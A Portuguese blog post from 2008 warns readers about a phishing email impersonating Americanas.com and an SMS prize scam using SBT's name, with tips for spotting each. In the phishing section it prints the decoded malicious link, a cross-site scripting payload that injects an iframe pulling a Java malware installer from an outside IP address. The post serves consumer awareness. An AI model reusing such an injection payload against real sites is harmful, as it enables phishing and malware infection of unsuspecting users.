Esse scam é até muito bem feito, pois usa uma técnica diferente para direcionar o usuário ao endereço malicioso e applet java para instalar malware. Algo chamado Javascript Injection. O link possui uma instrução que invalida todo o restante, então, para os leigos, o link está corretamente direcionado para o site das Lojas Americanas. Outras dicas são:

1. Você alguma vez comprou no site Americanas.com ou Submarino.com? Caso contrário, qualquer e-mail que chegue dizendo-se passar por um desses serviços é MENTIRA. Apague imediatamente.
2. Não achou estranho você ser “sorteado” e nem mesmo o seu nome aparecer no e-mail? E como assim você precisa “validar seu e-mail”? Eles sabem quem é você, possuem seu endereço completo e seu telefone. Algum motivo para enviarem um e-mail?
3. Note o link. Ele veio enorme e com muitos caracteres estranhos, não? Isso é uma tentativa de execução de javascript direto no seu navegador. Recebi 2 e-mails desses, mas só o segundo continha o código correto, o primeiro não fazia absolutamente nada, ou seja, os “hackers phodões” fizeram merda e erraram o código. A URL depois de decodificada fica assim:
   

   http://carrinho.americanas.com.br/portal/meuCadastro.portal?_nfpb=true& LoginControllerPortlet_actionOverride=<script>window.onload=function(){ with(document.body.style){border=”none”;margin=”0 0 0 0″};document.body.innerHTML=’<iframe src=http://203.124.22.143/java/index.htm style=border:none;height:700;width:1000>’};document.title=’Americanas’ </script><textarea>

4. Ao entrar no site que o e-mail tentava direcionar, abre-se uma tela pedindo solicitação para instalar um JAVA. Atenção! Um applet java possui os mesmos direitos de acesso ao seu computador que o usuário que o está executando, em sua maioria, o administrador. Isso é um perigo potencial e instalar essa solicitação é altamente desaconselhada. A tela exibida está abaixo.

Mensagem original (screenshot)

Tela que simula o site Americanas.com (screenshot)

Mensagem original (texto)

Você está entre os 10 e-mails sorteados da Promoção Cliente Especial. TV 42″ LCD (1920 X 1080 Pixels), Full HD, 2 Conexões HDMI e Double Window – 42LY3RF – LG

Seu e-mail foi sorteado entre os milhares em nosso banco de dados e você foi selecionado para ganhar uma TV LCD! Apenas 10 e-mails foram sorteados, e desses 10, apenas 1 será o ganhador da Promoção Americanas Cliente Especial. Você está na reta final para ter uma TV LCD 42″, basta acessar nosso link clicando no botão Validar Email logo abaixo e confirmar seu nome e endereço

ATENÇÃO: A Americanas.com não solicita dados como cartão de credito por e-mail.

Sempre confira se o link é para o site verdadeiro da Americanas.com

Nunca informe sua senha para terceiros.

Seu e-mail precisa ser verificado por você caso deseje participar da promoção. Para isso basta clicar no botão Validar E-mail.

Mensagem recebida por e-mail em 16/04/2008

1. Você participou de algum concurso relacionado à empresa que, supostamente, enviou o torpedo?
2. A empresa informou que entraria em contato por SMS?
3. Se você se acha mesmo tão sortudo, desconfie por um segundo e visite o site da empresa, ou ligue para o seu Serviço de Atendimento oficial. Uma visita ao site do SBT, por exemplo, esclareceria qualquer dúvida, graças ao pop-up (bem que podiam ter incorporado o texto à própria tela de entrada) com o aviso:
   

   IMPORTANTE:
   Recebeu uma mensagem dizendo que ganhou um prêmio do SBT? Cuidado!
   Se você recebeu uma mensagem SMS dizendo que participou de uma promoção do SBT e que é um ganhador, cuidado: o SBT não entra em contato com os ganhadores através de mensagem de texto e jamais pede que seja feito qualquer depósito em dinheiro ou exige a compra de algum produto em troca. Jamais forneça seus dados pessoais ou desembolse qualquer quantia em dinheiro. Fique atento, pois é fraude!

4. Sim, é fraude. Se você não resistir e ligar para o tal número, o golpista solicitará que compre alguns cartões pré-pagos de recarga para celular e que torne a ligar para informar os números dos cartões. Esse seriais são usados por criminosos para comandarem seus “negócios” de dentro da prisão, ou são vendidos por um valor inferior ao de face.
5. Na pior das hipóteses, você acabará fornecendo seus dados pessoais e poderá ser vítima do golpe do seqüestro-relâmpago no futuro.

Não seja enganado pela sua própria ganância, sim?

Mensagem Original:

(SBT): GUGU 25 ANOS, INFORMA SEU APARELHO MOVEL,FOI PREMIADO,E VC GANHOU 1GOL FLEX 0KM + INF:LIGUE GRATIS DE SEU FIXO, XX-XXXXXXXX LIGUE URGENTE

Mensagem recebida via telefone celular em 3 de janeiro de 2008.

* Colaborou: Fabio Seixas.

[tags]carro,celular,golpe,prêmio,sbt,sms,torpedo[/tags]